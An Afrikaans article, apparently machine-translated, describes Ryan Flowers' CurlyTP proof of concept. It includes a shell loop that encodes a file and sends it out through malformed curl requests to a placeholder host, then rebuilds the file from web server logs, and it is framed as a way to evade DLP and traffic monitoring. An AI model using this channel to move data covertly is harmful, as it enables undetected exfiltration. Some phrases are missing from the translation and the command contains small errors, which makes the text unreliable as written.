Volgens die Wikipedia-definisie is 'n dooie druppel 'n samesweringsinstrument wat dien om inligting of sommige items uit te ruil tussen mense wat 'n geheime ligging gebruik. Die idee is dat mense mekaar nooit ontmoet nie – maar hulle ruil steeds inligting uit om operasionele veiligheid te handhaaf.
Die wegkruipplek moet nie aandag trek nie. Daarom gebruik hulle in die vanlyn wêreld dikwels diskrete goed: 'n los baksteen in die muur, 'n biblioteekboek of 'n holte in 'n boom.
Daar is baie enkripsie- en anonimiseringsinstrumente op die internet, maar die feit dat hierdie instrumente gebruik word, trek aandag. Daarbenewens kan hulle op korporatiewe of regeringsvlak geblokkeer word. Wat om te doen?
Ontwikkelaar Ryan Flowers het 'n interessante opsie voorgestel - . As jy daaroor dink, wat doen 'n webbediener? Ontvang versoeke, reik lêers uit en skryf logs. En dit teken alle versoeke aan, selfs verkeerdes!
Dit blyk dat enige webbediener jou toelaat om byna enige boodskap in die log te stoor. Blomme het gewonder hoe om dit te gebruik.
Hy bied hierdie opsie:
- Neem 'n tekslêer (geheime boodskap) en bereken die hash (md5sum).
- Ons enkodeer dit (gzip+uuencode).
- Ons skryf na die logboek deur 'n doelbewus verkeerde versoek aan die bediener te gebruik.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shOm 'n lêer te lees, moet jy hierdie bewerkings in omgekeerde volgorde uitvoer: dekodeer en pak die lêer uit, kontroleer die hash (die hash kan veilig oor oop kanale versend word).
Spasies word vervang met =+=sodat daar geen spasies in die adres is nie. Die program, wat die skrywer CurlyTP noem, gebruik base64-kodering, soos e-posaanhangsels. Die versoek word gemaak met 'n sleutelwoord ?transfer?sodat die ontvanger dit maklik in die logs kan vind.
Wat sien ons in die logs in hierdie geval?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"Soos reeds genoem, moet u die bewerkings in omgekeerde volgorde uitvoer om 'n geheime boodskap te ontvang:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gDie proses is maklik om te outomatiseer. Md5sum pas, en die inhoud van die lêer bevestig dat alles korrek gedekodeer is.
Die metode is baie eenvoudig. “Die punt van hierdie oefening is net om te bewys dat lêers deur onskuldige klein webversoeke oorgedra kan word, en dit werk op enige webbediener met gewone tekslogboeke. In wese is elke webbediener ’n wegkruipplek!” skryf Flowers.
Natuurlik werk die metode net as die ontvanger toegang het tot bedienerlogboeke. Maar sulke toegang word byvoorbeeld deur baie gashere verskaf.
Hoe om dit te gebruik?
Ryan Flowers sê hy is nie 'n inligtingsekuriteitskenner nie en sal nie 'n lys van moontlike gebruike vir CurlyTP saamstel nie. Vir hom is dit net 'n bewys van konsep dat die bekende gereedskap wat ons elke dag sien op 'n onkonvensionele manier gebruik kan word.
Trouens, hierdie metode het 'n aantal voordele bo ander bediener-“huide” soos of : dit vereis nie spesiale konfigurasie aan die bedienerkant of enige spesiale protokolle nie - en sal nie agterdog wek onder diegene wat die verkeer monitor nie. Dit is onwaarskynlik dat 'n SORM- of DLP-stelsel URL's vir saamgeperste tekslêers sal skandeer.
Dit is een van die maniere om boodskappe deur dienslêers te stuur. Jy kan onthou hoe sommige gevorderde maatskappye voorheen geplaas het of in die kode van HTML-bladsye.
Die idee was dat slegs webontwikkelaars hierdie paaseier sou sien, aangesien 'n normale persoon nie na die opskrifte of HTML-kode sou kyk nie.
Bron: will.com